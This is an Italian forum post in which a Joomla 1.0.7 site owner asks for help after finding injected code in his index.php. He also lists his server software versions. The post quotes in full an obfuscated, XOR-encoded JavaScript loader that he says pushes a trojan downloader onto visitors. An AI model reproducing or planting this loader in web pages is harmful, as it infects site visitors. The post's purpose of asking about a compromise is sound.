Salve,
Sono Marco e ho installato una stabile di joomla un paio di anni fa,
spero di essere nel forum giusto per fare la mia richiesta, me ne scuso in anticipo.
il 26/10/2006 è apparsa nel mio index.php
la seguente stringa
echo "\n<script language=\"JavaScript\">e = '0x00' + '19';str1 = \"%A2%FA%F1%EC%86%EB%EA%E1%F2%FD%A5%B8%EC%F1%EB%F1%F8%F1%F2%F1%EA%E1%A0%FE%F1%FA%FA%FD%F4%B8%A4%A2%F1%FC%E8%F9%F5%FD%86%EB%E8%FB%A5%B8%FE%EA%EA%F6%A0%B7%B7%EA%F1%F6%F7%FB%F4%EA%B4%FB%F7%F5%B7%F2%FA%B7%F5%FD%F4%EA%B7%B8%86%EF%F1%FA%EA%FE%A5%A9%86%FE%FD%F1%FF%FE%EA%A5%A9%A4%A2%B7%F1%FC%E8%F9%F5%FD%A4%A2%B7%FA%F1%EC%A4\";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>\n";
è uno script che fa scaricare da un sito un trojan, esattamente il Trojan- Downloader.Js.Psyme.hz
ora vorrei sapere se qualcuno è a conoscenza del bug che viene sfruttato per fare questi inserimenti oppure se io in qualche maniera ho fatto qualche sbaglio?
qui sotto vi lascio le varie versioni di DB Joomla Server ecc...
PHP built On: Windows NT NT-01 5.2 build 3790
Versione database: 4.0.25-max-log
Versione PHP: 4.4.0
Web Server: Microsoft-IIS/6.0
WebServer to PHP interface: cgi-fcgi
Versione Joomla!: Joomla! 1.0.7 Stable [ Sunburst ] 15-Jan-2006 20:00 UTC
grazie mille!
